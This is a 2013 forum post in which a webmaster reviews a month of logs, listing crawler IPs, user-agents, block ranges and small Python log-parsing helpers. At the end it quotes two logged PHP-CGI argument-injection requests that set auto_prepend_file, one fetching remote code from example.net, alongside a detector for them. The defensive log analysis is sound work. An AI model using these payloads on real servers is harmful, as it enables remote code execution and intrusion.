Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

    
Revised Spider IPs and Other Details
At Home with the Robots: 2013 edition
lucy24




msg:4544454
 8:30 am on Feb 11, 2013 (gmt 0)

At Home with the Robots: 2013 Edition

Yup, it's that time again [webmasterworld.com]. It wasn't a perfect time for bot tracking: a mid-month server move means that I ended up losing about 24 hours' worth of logs (in bits and pieces over two or three days). But we do what we can.

General disclaimer: Some of the User-Agent strings may not be exactly right. Some extra spaces and single quotes are an artifact of my log-wrangling routines.


Cut to the Chase:

If you don't feel like reading the whole thing, these are some of the new IP blocks I added after looking over January's logs. Many are associated with robots that were already blocked for other reasons, like UA or behavior, but no harm in blocking both ways.

37.139.52.23 blocked as 37.139.0.0/18 (hosting)
64.223.64.0/18 (yet another Fairpoint-within-verizon range)
68.235.38.7 (blocked as 68.235.32.0/19) One of the nasties; the UAs included "start.exe".
91.223.75 (Russia)
109.169.0.0/18, 109.169.64.0/19
178.33.142.48/28 (Russian-- I hate blocking this small, but there are humans in the neighborhood)
208.131.128.0/19 hosting (malign robot at 208.131.138.208)
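
For anyone who would rather test an address against this list than eyeball it, here is a minimal Python sketch using the standard ipaddress module. The function name is made up for illustration, and the bare "91.223.75" entry is written out as a /24, which is an assumption about what was meant.

```python
import ipaddress

# Blocks copied from the list above. "91.223.75" is expanded to a /24
# here; that expansion is an assumption, not something the list states.
BLOCKED = [ipaddress.ip_network(n) for n in (
    "37.139.0.0/18",
    "64.223.64.0/18",
    "68.235.32.0/19",
    "91.223.75.0/24",
    "109.169.0.0/18",
    "109.169.64.0/19",
    "178.33.142.48/28",
    "208.131.128.0/19",
)]

def is_blocked(ip: str) -> bool:
    """Return True if ip falls inside any of the listed blocks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED)
```

Calling is_blocked("208.131.138.208") returns True, since that address sits inside 208.131.128.0/19.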


The Good...

1. There are some things money can't buy. For everything else, there's Google.

Google Search:
IP: 66.249.63-95
UAs:
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Googlebot-Image/1.0
Mobile:
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)
SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)
DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)

The last two are new to me, though apparently not to google. Last year at this time I saw only the iPhone version. They are still using OS 4_1 for their robot, though the real iPhone is now up to 6_1. The mobile UAs never ask for anything but pages; the vanilla googlebot gets everything; the imagebot gets images-- and, on one isolated occasion, the favicon.

Speaking of which: the google family remains somewhat random about robots.txt. Generally they pick it up every day or two. Sometimes it can be well over 24 hours. Can't say I especially care for this. I'll bet someone has a ready-made php script that will unconditionally block any robot that has not asked for robots.txt within the past 24 hours. But they do seem to obey what they read-- apart from claiming not to understand the Crawl-delay directive, so you have to go to GWT if you don't want them wolfing down multiple files in a single second. If you are in the habit of serving custom robots.txt files based on the asker's current UA, note that all requests for robots.txt come from the googlebot by that name.
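
The 24-hour rule could look something like the sketch below. It is in Python rather than php, the class and method names are invented for illustration, and it assumes the caller has already decided that the client is a robot (a human visitor never asks for robots.txt and would be locked out at once).

```python
from datetime import datetime, timedelta

MAX_AGE = timedelta(hours=24)

class RobotsGate:
    """Remember when each known robot last fetched robots.txt."""

    def __init__(self):
        # client key (for example an IP) -> time of last robots.txt request
        self.last_fetch = {}

    def allow(self, client: str, path: str, now: datetime) -> bool:
        if path == "/robots.txt":
            # Asking for robots.txt is always allowed and resets the clock.
            self.last_fetch[client] = now
            return True
        seen = self.last_fetch.get(client)
        # Anything else is allowed only within 24 hours of the last fetch.
        return seen is not None and now - seen <= MAX_AGE
```

By this rule the googlebot would be turned away on the days when it goes well over 24 hours between pickups, so it is stricter than it may sound.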

Numbers: Slightly more than twice as many visits as last year. My record-keeping is admittedly slapdash, but I don't think I have twice as many files. About a quarter of the change is due to increased Googlebot-Mobile activity.

Referer: Conversely, there are not as many Googlebots arriving with a referer-- not that the numbers were ever especially huge. Here's a quirk I didn't notice last year, though it happened then too. Sometimes the referer requests come soon after a visit to the page it gives as referer. Other times there's no connection. And the original visit may not have been from the googlebot at all; sometimes it's one of the mobiles.

Faviconbot:
IP: 74.125
UA: blank

If I didn't have a <files> exemption for favicon.ico, the faviconbot would never get in at all. The exemption wasn't made for google's benefit; it's to help flag humans who may have been locked out by mistake. (Some robots will pick up the stylesheet that goes with the 403 page. I know of only one that also gets the favicon.)

Google Preview and Google Translate:
I didn't count them with the robots this year, except for some special cases. Preview persists in trying to get at piwik.js, even though they cannot possibly not know it's an analytics program.

Food for thought: Why, exactly, do previews-- Google, Bing, Seznam-- want javascript files? Most scripts involve either feature detection or user interaction. So a preview-with-scripting doesn't show what you would see. It only shows what the current Not-A-Robot would see.

Further Unanswerable Question: Since Preview does not play sounds, either upfront or on request, and since the .midi extension can't be anything but a sound file ... why does Google Preview persist in asking for .midi files? I don't know whether this is a new habit or an ongoing one. Last year I didn't have any sound files worth mentioning-- and the ones I did have were formatted as <a href> downloads. Now I've got a slew of them embedded in one subdirectory.

2. We Try Harder.

Once again, Bing/msn is the single most common robot if you count all requests. But this year it remains in the #1 spot even if you don't count robots.txt. There have been recent posts commenting on increased bingbot activity. It's definitely evident in my case.

Key change from last year: After looking at the behavior of the assorted bing/msn entities, I blocked the plainclothes bingbot. So you won't find it here.

bingbot
IP ranges: 65.52, 157.55, 207.46
plus 65.54.247.145 for BingSiteAuth (BWT) only
UA: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)

The bingbot retains a hearty appetite for robots.txt, though it has dropped back a little from last year's morbid extremes. In the course of the month, about 2/3 of all robots.txt requests came from the bingbot-- down from 80% last year. One time it went seven hours without asking for robots.txt. Conversely, I don't see any place where the bingbot-- by that name-- asked more than two times in a row. But overall, about 1/3 of their requests were still for robots.txt.

msnbot
IP ranges: 65.66, 131.253, 207.46
UA: msnbot/2.0b (+http://search.msn.com/msnbot.htm)

You can tell how busy bing was: they had to bring the vanilla msnbot out of retirement to pick up some of the overflow. Most of the time it just asked for robots.txt followed by the sitemap, but a few times around midmonth it even collected a page or two.

msnbot-media
IP: 65.66, 131.253, 207.46
UA: msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)

This robot went through a striking sea change early last fall. Up to then it had an absolutely consistent pattern: robots.txt, one image, and then the page the image belongs to. Things started to go haywire on 21 August (I went back and checked logs). For the next week or so it averaged about four robots.txt requests to every one image. Its last old-style visit-- robots.txt, image, page-- came on the 29th. Then a few more robots.txt, one image ... and finally, from the 2nd to the 14th of September, came 64 (sixty-four) consecutive requests for robots.txt. After that it settled into its new pattern: robots.txt, image, two by two in strict alternation. No pages.

Bing Preview
Everything I said about Google Preview applies equally to bing. They didn't happen to visit any gallery pages this month, so I don't know if they would have gone for the .midi files.

3. Can you say 'rat' in Russian?

IP (Russia): 95.108.151.244, 95.108.150.235, 178.154.243.81
IP (US): 199.21.99.106
IP (favicon only): 37.9.84.253
UA:
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)
and two new ones:
Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)
Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)

Obviously those are not Yandex's complete IP ranges, but they like to pick an exact address and stick with it. So these are the only ones I've seen this month. Current visits are divided about half-and-half between the Russian and US IPs. In a complete flipflop from last year, the 95. range is used only by the YandexBot, while 178. is only for images. The US range gets both.

I don't know what they do with the favicon. No skin off my nose. Their information page [help.yandex.com] sheds no light on the MirrorDetector. Pretty droll in my case, since my only mirrored pages are in a language they don't support. (Their WMT says so; there's a section that lists crawled-but-not-indexed pages and says why for each individual one. Don't you wish G and B had the same feature?)

Yandex's imagebot seems to have been on vacation-- possibly it runs on the Orthodox church calendar, which currently lags 13 days behind the Gregorian-- and didn't show up until the 18th. But it quickly made up for lost time, mainly by scrambling around and confirming that most of my pictures hadn't changed since last time.

Seznam
IP: 77.75.77.11, .17
UA: SeznamBot/3.0 (+http://fulltext.sblog.cz/)

Czechs must spend a lot of time online. I can't think of another country this size whose search engine is so visible. Half of the time they just pick up robots.txt and the sitemap, but sometimes they'll get a few pages as well. Like Google and Bing, they've got a preview, in their case called the screenshot-generator. And just like the big boys, it has to be told to stay the bleep out of piwik.

Mobile Goo
IP: 218.213.13x
UA: DoCoMo/2.0 P900i(c100;TB;W24H11) (compatible; ichiro/mobile goo; +http://search.goo.ne.jp/option/use/sub4/sub4-1/)

With a name like that, could it come from anywhere but Japan? Here's the odd part: I was going to say that I first set eyes on them in March of 2012, though they didn't really become active until this past month. But processed logs say it ain't so. They paid a couple of long visits way back in April 2011, picking up several hundred HEADs of images. Only. Some months later they came back and behaved so innocuously that I've ignored them ever since. So right now I can't tell if they're pushing up their activity level, or they're one of those robots that operates by fits and starts.

BlekkoBot
IP: 38.99.97.36 and 199.87.253.49
UA: Mozilla/5.0 (compatible; Blekkobot; ScoutJet; +http://blekko.com/about/blekkobot)

As far as I know, these folks never set foot on my site until April 2012. It's still not a very heavy foot: robots.txt, front page, favicon, one specific inner page. (Always the same one.) The person who runs this robot reads, or used to read, the WebmasterWorld forums. That's all I know about it.

TosCrawler
IP: 60.36.84.49
UA: TosCrawler/Nutch-1.6 (http://www.toshiba.co.jp/rdc/about/crawl_info.htm; 'Rdc-crawler at ml dot toshiba dot co dot jp')
changed just a few days ago to
TosCrawler/Nutch-1.6 (http://www.toshiba.co.jp/rdc/about/crawl_info_en.htm; 'Rdc-crawler at ml dot toshiba dot co dot jp')

Another newcomer, as far as I can tell. First known sighting, September 2012; they didn't really become active until November. The info page says
The main goal of developing the crawler is to collect web pages for R&D related to natural language processing. Using the collected web pages, we extract new or unknown words, and we analyze statistical information such as word frequency. Utilizing this information, we develop highly accurate statistical machine translation systems, text-to-speech systems and so on.

I hope this is true, because it's something I would definitely support. Insert nasty cracks ad lib about caliber of linguistic information to be gleaned from study of any site with my name on it. They are also one of the very, very few places that answer "Is this your robot?" e-mails. Currently they seem to be absolutely in love with my site; it's especially noticeable because I haven't got around to ignoring them yet.

Yeti (Korea) and Baidu (Japan)
IP: 61.247.204 (Yeti), 119.63.19x (Baidu)
UA:
Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

Not much activity this month, but I note them for appearances' sake. I wouldn't swear to the MSIE 7 one. It comes from 119.63.193 which does belong to Baidu (119.63.192-199) but their regular spider activity is from ..196.

MJ12bot
User-Agent: Mozilla/5.0 (compatible; MJ12bot/v1.4.1; http://www.majestic12.co.uk/bot.php?+)

No change from last year, when I said:
They refuse to have their own IP, so you can't tell if it's the real thing or a spoofer. They also seem to have a lot of trouble getting names right: constant directory-slash redirects alternating with top-level www redirects.

One time this month they ate a steady stream of what would have been /index.html redirects, except that they were operating from a blocked IP range.

exabot
IP: 193.47.80.81
UA: Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)
Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)

The only reason I tolerate these guys is that they're simply too boring to block. At some point when I wasn't paying attention-- last December, it turns out-- they added the "BiggerBetter" UA. It must be working off an ancient shopping list, because its only requests to date have been for pages that ceased to exist some time in 2011. This sends it scurrying for the sitemap-- but it might have done this anyway.

YioopBot
IP: 173.13.143.74, ..78
UA: Mozilla/5.0 (compatible; YioopBot; +http://173.13.143.74/bot.php)

Like the BlekkoBot, this one is run by a WebmasterWorld reader. Last year it appeared only as a walk-on, with a single occurrence of
173.13.143.78 - - [15/Jan/2012:05:14:54 -0800] "GET /robots.txt HTTP/1.1" 206 517 "-" "Mozilla/5.0 (compatible; YioopBot +http://www.yioop.com/bot.php)"
Notice the 206? I don't think I have ever met any other robot that bothered with a 206 on robots.txt. The YioopBot's record for January 2013 is sixteen of them in a single calendar day. My preliminary guess was that it's running one of those scripts that says "If the file has changed, give it to me; otherwise just toss me the header." Further investigation suggests that this robot simply doesn't have a very big appetite. January was a narrowly focused month: apart from two 206's on the sitemap-- and one on the Panda Page for appearances' sake-- it wasn't interested in anything but robots.txt. But on a few visits in November and December it really extended itself, scooping up 206s right and left. If anyone knows more about this robot I would like to hear it; I took a closer look at those November-December hits and simply couldn't make head or tail of it.
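
For anyone who wants to hunt for the same thing in their own logs, here is a rough Python sketch that picks out 206 responses to robots.txt. It assumes the Apache combined log format of the line quoted above; the function names are invented for illustration.

```python
import re

# Apache "combined" log format, matching the sample line quoted above.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def parse_line(line: str):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def partial_robots_hits(lines):
    """Yield parsed entries that received a 206 on /robots.txt."""
    for line in lines:
        entry = parse_line(line)
        if entry and entry["status"] == "206":
            parts = entry["request"].split()
            if len(parts) >= 2 and parts[1] == "/robots.txt":
                yield entry
```

Counting the yielded entries per IP and per calendar day would give the sort of tally mentioned above.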

CareerBot
IP: 178.77.126.55
User-Agent: Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)

I think this one first showed up in July. Information page says:
Der CareerBot ist der Webcrawler von Career-X. Der CareerBot crawlt durch das Internet, um aktuelle Stellenangebote von Unternehmen zu finden.

Evidently my front page is enough to tell it that I am not an Unternehmen and it won't find any aktuelle Stellenangebote here, because that's all it has ever asked for. Yawn.

Verisign
IP: 69.58.178.59
User-Agents: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1
BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 ips-agent

These folks swing by once a month like clockwork. Generally they just pick up the top-level directory pages. I don't know what they're doing, but it's no skin off my nose.

TurnitinBot
IP: 38.111.147.83
UA: TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)

One of those plagiarism checkers, I think. I've only seen them about six times in the past year, generally picking up a dozen or so pages. Shrug.

IA archiver
IP: 174.129.237.157
User-Agent: ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)
IP: 207.241.226.10x
User-Agent: ia_archiver(OS-Wayback)

Some people hate this robot on principle. Some like it on the same principle. I'm not looking to start a fight --not here and now, anyway-- so I just note its continued existence.

other archivers
IP: various
User-Agent: Mozilla/4.0 (compatible;)
Requests: images only

Someone once explained to me what these critters do. They're somewhere on the cusp between robot and human. The one I see most often comes from one of the Keewaytinook Okimakanak (chiefs council) ranges, meaning satellite internet at the far end of Ontario. As a further oddity, most of their requests are for an image file that hasn't been used since October-- that is, the file itself exists, but it's no longer used by its formerly requesting page. One of these days I will ask them what they plan to do with all those copies of my administrative gif. There is no shadow of a doubt that the original visitor was human.

The rest of the rest:

Finally there are the visitors who must have some pretensions to robotitude, because they asked for robots.txt. Most of them went on to ask for the front page and nothing more. If that's all they're going to ask for, I don't even particularly care if they got robots.txt or not. The group includes some that were more visible last year: picsearch, findlinks, and 80legs among others. This year they just popped their heads in for a moment. Or possibly-- like the YioopBot-- they did their major pickups in some other month, so I simply didn't notice them.


To be continued...

 

lucy24




msg:4544680
 8:08 pm on Feb 11, 2013 (gmt 0)

At Home with the Robots: 2013 edition, Part Two

Given a choice between bisecting a post and trimming it...

The Bad...

New This Year
The robots themselves aren't new, only their position. These are the ones I reclassified from "No skin off my nose" to "Get thee hence!" after last year's closer look.

The plainclothes MSIE-bot
IP: 131.253, 65.52, 65.55
UA: begins with Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1 or 5.2 and then varies at random
robots.txt? What on earth for? I'm just a human who works for Microsoft and therefore naturally uses MSIE 7. Last year, most visits followed a pattern: one random html file, followed by any one non-image subsidiary file like css or js. This year it's nothing but .html files. Maybe it's because they're denied access to that initial page, so they don't know what to ask for next.
Someone hereabouts said that the plainclothes MSIEbot isn't a robot at all; it works for Bing Translate. Personal experiment doesn't support this interpretation, though.

Ezooms
IP: 208.115.111.72, ..113.88 (this year, as last year, it's only these exact two)
UA: Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)
Distinguishing feature: UA that includes a gmail address. I originally blocked them because they share an IP with the not-so-nice dotbot. The dotbot hasn't been around in a while, and ezooms seems to obey robots.txt, so I was thinking of unblocking them. After some cursory research I dropped the idea. Among other things, they claim their connection is through "dotnetdotcom.org" which kinda suggests that it's all the same robot anyway. And I don't think anyone has ever figured out what they do.

YahooCacheSystem
IP: 98.139.241.24n
UA: YahooCacheSystem
I haven't seen these folks since November. But robots sometimes take long breaks, so I mention them here.

Yahoo! Slurp
IP: 72.30, 98.137
UA: Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp) NOT Firefox/3.5
Got that? NOT Firefox 3.5, so don't go treating us as if we were Firefox 3.5, meaning ... uh ... don't lock them out? (Even Camino, whose UA string is a little iffy, says emphatically "like Firefox 3.6". Clearly something must have happened in that 1/10 of a step.) Distinguishing feature: All requests-- blocked, of course-- are followed by the 403 page's style sheet. But by weird coincidence they only ask for the favicon when the original request was for the front page. Hmmm.

This year we also have a
Yahoo! Slurp China
IP: 110.75.173-176
The name says it all. In linguist-speak, this is called Double Markedness.

mail.ru
I've gone back and forth on these guys. Somewhere in the background is a legitimate Russian ISP. Latest discovery: As with bing/msn, there are two entirely different entities. I've provisionally unblocked the robot only. So far they don't seem to have noticed.

Robot:
IP: 217.69.133.68, ..134.56
UA: Mozilla/5.0 (compatible; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)
The robot behaves perfectly well. Asks for and obeys robots.txt, no matter how often it gets the door slammed in its face.

Images:
IP: 217.69.135.91
UA: Mozilla/5.0 (compatible; Mail.RU/2.0c)
and
Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0
This one gets us into profiler territory. Every visit follows the same pattern:
GET {some image from /games/ directory} with blank referer, using first UA
GET {exactly the same thing}
GET {same image file} with referer http://go.mail.ru/search_images, using second UA

Repeat with four more /games/images/ files, for a total of 15 requests at intervals of 1-2 seconds. They do this about twice a month on average. Past experience with a similar pattern suggests they may respond to the 127.0.0.1 redirect; I'll try it one day. A final quirk is this:
217.69.135.91 - - [07/Feb/2013:09:08:08 -0800] "GET http://www.example.com/games/images/SquatterPic.jpg HTTP/1.1" 403 1495 "-" "Mozilla/5.0 (compatible; Mail.RU/2.0c)"
All requests come through like that in logs. File under: Yet another thing that someone once explained to me but I've forgotten the explanation.
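
A request line with the full URL in it is the form HTTP clients use when talking to a proxy, which may or may not be what is going on here. Whatever the reason, such requests are easy to pick out of a log. A minimal Python sketch, with an invented function name, taking the quoted request field of a log line:

```python
def is_absolute_form(request_line: str) -> bool:
    """True if the request target is a full URL rather than a path."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    target = parts[1].lower()
    return target.startswith(("http://", "https://"))
```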


Same old same old

Baidu (China):
IP: 123.125; 180.76; 220.181
UAs: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) the same as Baidu-Japan
Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDR; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; Tablet PC 2.0)

Baidu has been getting clumsy: there's a fair number of requests for broken URLs like "/fonts/naamaj" or "/hovercraft/n". Looking back, I see it was already doing this a year ago. Well, if you're going to get the door slammed in your face regardless, why bother to get the name right?

Soso:
IP: 124.115.6.13
UA: Mozilla/5.0(compatible; Sosospider/2.0; +http://help.soso.com/webspider.htm) note missing space
How are the mighty fallen! Couple of years back, Soso was one of the ickier spiders around. Then, starting around September 2011, it was only allowed to give its name when asking for robots.txt-- the robotic equivalent of working traffic on Staten Island. The rest of the time it came in with a generic MSIE UA. Even this got squashed partway through January 2012, though I didn't realize it at the time. Since then, all the SosoSpider has done is ask for robots.txt. And it can't even get this right. It asks for robots.txt with the wrong form of the domain name, gets redirected, and never bothers to come back and ask again with the correct name. Once a day, every day.

JikeSpider:
IP: 1.202.218.71
UAs: Mozilla/5.0 () and that's all
Mozilla/5.0 (compatible; JikeSpider; +http://shoulu.jike.com/spider.html)
I don't know if this one is on its way in or on its way out. Since it operates from China, it will be blocked regardless.

There are assorted other Chinese robots-- some of whom try to disguise themselves by claiming Russian as their first language-- but they're all much of a muchness.

The Ukrainians
IP: 46.118.118, 92.249.127, 94.153.65.92, 176.8.91.143, 178.137.162.140, 193.106.136, 195.242.218, 213.110.133.221
UA: random
Like the man said: The Ukrainians you will always have with you. But oh! what a pang of nostalgia it gave me to find them still at it. Their favorite page is still lions.html, with occasional forays into duct_tape, Rambles and-- late in the month-- mice.html (a gallery page and therefore pointless without its illustrations, as is lions). They always make two consecutive requests, always with a fake referer and an improbable UA like
Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)
or
Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)
What do they want? Who knows? Who cares? Maybe it's just referer spam. Most are from .ru domains so they would be blocked even if I didn't already know the IP. The double request is new since last year; they used to come in threes. I'm not complaining.
Note that 176.9 is Hetzner, so 176.8.0.0/15 can be conveniently blocked in one go.
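
The arithmetic behind that /15 can be checked with Python's ipaddress module. This is only an illustration of the prefix math, and the variable names are made up.

```python
import ipaddress

first_16 = ipaddress.ip_network("176.8.0.0/16")
second_16 = ipaddress.ip_network("176.9.0.0/16")

# Two adjacent /16s share a /15 parent when the first one has an even
# second octet. supernet() shortens the prefix by one bit.
combined = first_16.supernet()

# Both halves land on the same parent block.
same_parent = second_16.supernet() == combined
```

Here combined is 176.8.0.0/15, and it contains 176.8.91.143 from the list above as well as everything in 176.9.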

The Russians
IP: 37.139.52.23, 91.223.75, 91.237.249, 95.24.182.19, 176.195
UA: various
Exactly the same as the Ukrainians except that, uh, they're from Russia ;) The set at 91.223.75 (that's 91, so you really are stuck at the /24 level) is a new addition to the block list. They'd always given .ru referers so I never noticed that the IP itself was open, until they came waltzing in with a .com: Oi! How did you get in here?

ahrefsbot
IP: 173.199.114-120
User-Agent: Mozilla/5.0 (compatible; AhrefsBot/2.0; +http://ahrefs.com/robot/)
A year ago:
I have no idea what, if anything, they're about. I just know that they seem to think robots.txt is non-perishable: about once a month they pick up three copies in a batch, and then carry on regardless. Don't know whether they even read it; they don't dig deeply enough for me to be sure.

They've now gone over to a single weekly pickup of robots.txt. And, hm, they seem to be operating from an entirely new IP. They're blocked by UA, so I never noticed.

facebookexternalhit
IP: 66.220.144-159; 69.171.224-255; 173.252.64-127
UAs:
facebookexternalhit/1.0 (+http://www.facebook.com/externalhit_uatext.php)
facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
The 1.0 UA is apparently brought out to switch-hit when 1.1 gets tired, or anticipates getting tired. When there's a long string of requests for the same file, they go by pairs: 1.1, followed within one second by 1.0.
I have yet to see one iota of evidence that facebookexternalwhatsit can benefit me in any way whatsoever. But I made one change: There's no reason to block HEAD requests, since they're simply confirming that a given image file exists. (I've never prevented them from looking at pages; they show up in logs as 206.)
The 173.252 range is a new one on me; looking back, I first find them in November.
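
Ranges written as a span of third octets, like the three above, can be turned into CIDR blocks mechanically. A short Python sketch with an invented helper name, assuming each range runs from x.y.lo.0 through x.y.hi.255:

```python
import ipaddress

def third_octet_range_to_cidrs(prefix: str, lo: int, hi: int):
    """Turn e.g. ("66.220", 144, 159) into the CIDR blocks covering
    66.220.144.0 through 66.220.159.255."""
    first = ipaddress.ip_address(f"{prefix}.{lo}.0")
    last = ipaddress.ip_address(f"{prefix}.{hi}.255")
    return [str(n) for n in ipaddress.summarize_address_range(first, last)]
```

The three ranges listed come out as one block each: 66.220.144.0/20, 69.171.224.0/19 and 173.252.64.0/18. A range that does not start on a tidy boundary comes back as several blocks.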

Trendmicro
IP: 150.70 (last year I also met them at 216.104.15)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Some folks don't mind them. I say I don't like their face. I especially don't care for them requesting piwik files-- accompanied by the same query string that their preceding human just used.

websense
IP: 208.80.194 (full range .192-.199, but .194 is all I see)
User-Agent: varies
Much less active than last year at this time. Whew. Last year I was especially riled about their sister IP, 208.87.232-239, which attacked my sister site, the art studio. I have since learned that the reason they put on such a good impersonation of a human is that they were human. Oops. Under the name SurfControl, this IP is used as a proxy by our county government offices. You might think this serves people right for browsing the web on office machines during work hours, but the studio has a quasi-official status so you have to let them in.

... and similarly
TalkTalk
IP: 62.24
Somewhere at the back of this group is a normal ISP. It's got parental-control functions and anti-virus functions and who knows what else. Anyway, they annoy me.

NOC (for want of a better label)
IP: 184.22.183.114 and ..211.146
UA: Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0
Last year at this time they gave their address as ..182.90 and ..46.14 with the same UA. I didn't especially notice them at the time; there were a few visits in the Miscellaneous bin. I have no idea what they're looking for, but people using FF 6 are generally up to no good. Random skipping through mid-year logs finds them using an even more unlikely "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)". Regardless of exact name and address, they keep asking for the same handful of pages over and over, in particular the trio
/games/
/games
/games/index.html

which are all, of course, the same file. If they weren't blocked (184.22 complete), two of the three would get redirected.
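
When tallying requests it can help to fold those three forms into one. A minimal Python sketch with an invented function name; it assumes that index.html is the directory index and that a final path segment without a dot is a directory.

```python
def canonical_path(path: str) -> str:
    """Collapse the directory-index variants onto one form ("/games/")."""
    if path.endswith("/index.html"):
        # Drop the explicit index file, keep the trailing slash.
        path = path[: -len("index.html")]
    elif not path.endswith("/") and "." not in path.rsplit("/", 1)[-1]:
        # No trailing slash and no file extension: assume a directory.
        path += "/"
    return path
```

All three of /games/, /games and /games/index.html come out as /games/, while an ordinary page such as /fonts/ukiuq.html is left alone.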

auto-referers
Still around, and I still haven't found a universal way to block them. Identify after the fact, yes. Make a RewriteRule to send them into oblivion, no. Requests for some of the largest files are individually coded in htaccess; that's about all I can do.


Two for the Profilers

Some robots are distinguished by behavior patterns rather than UA or IP. For the past few months I've been particularly vexed by

the index.php botnet
IP: various
UA: various
That's my personal name for them, faute de mieux. Botnets don't have official names, do they?
Pattern: Always four requests, in this order:
#1 any random interior page, usually with auto-referer, sometimes a spam-type referer
#2 /fonts/ with either auto-referer or my front page as referer
#3 /fonts/index.php with /index.php as referer
#4 my front page, again with /index.php as referer.
I've picked out a few recurring IPs for blocking, but in general there's not a ### thing I can do. They're not clearly identifiable until the third request-- and that one's blocked anyway because of the .php extension. I could block the mydomain/index.php referer, but that's about it.
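
The referer test is simple enough to sketch in Python. The host names below are placeholders, the function name is invented, and the check assumes the site really has no /index.php of its own.

```python
from urllib.parse import urlsplit

# Placeholder host names; substitute the site's own.
OWN_HOSTS = {"example.com", "www.example.com"}

def has_bogus_index_referer(referer: str) -> bool:
    """True if the referer claims to be /index.php on our own site,
    a page that (by assumption) does not exist there."""
    parts = urlsplit(referer)
    return (parts.hostname or "") in OWN_HOSTS and parts.path == "/index.php"
```

This only catches requests #3 and #4 of the pattern; the first two arrive with referers that look like anyone else's.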

ukiuq.html
IP: various, all of them already blocked
UA: various, from quasi-human to blatantly robotic
Ukiuq (not its real name) is a UCAS legacy font so obscure that-- well-- it's so obscure that when I last searched for its real name, my page popped up in first place. That's obscure.
Pattern: Four requests, in this order:
#1 /fonts/ukiuq.html, with either auto-referer or outside spam referer
#2 my front page, with /fonts/ukiuq.html as referer
#3 my front page, with auto-referer
#4 same again


Gone and Soon Forgotten

A handful of robots that were highly visible last year don't seem to be around any more. Unless they simply took the month off. Shrug.

oBot
Gigabot
orangeask


And The Ugly

These are the unambiguous ones: the robots that stroll in and ask for "login.php" and files with "myadmin" in the name, or try to PUT and POST. There is apparently a finite number of likely robotic IPs, because I didn't get any completely new ones this time around. Most memorable:

GET /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://example.net/nophp/test.php

and similarly

POST /?-n+-d+allow_url_include%3D1+-d+auto_prepend_file%3Dphp%3a%2f%2finput
... sent to the wrong domain name, so it was met with a 301 that magically changed the attempted POST into a GET. (Just recently I read an explanation of how and why this happens, but-- stop me if you've heard this one-- I don't remember the details.)
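
Query strings of this shape are easy to recognize after the fact. Here is a rough Python sketch, with an invented function name, keyed to the two samples above: no raw "=" in the query, a leading "-" once decoded, and one of the two PHP setting names. It is a log-reading aid, not a complete filter.

```python
from urllib.parse import unquote_plus

def looks_like_php_option_injection(query: str) -> bool:
    """Flag query strings that decode to PHP command-line style switches."""
    if "=" in query:
        # Ordinary name=value query; the samples above have no raw "=".
        return False
    decoded = unquote_plus(query)
    return decoded.startswith("-") and (
        "allow_url_include" in decoded or "auto_prepend_file" in decoded
    )
```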


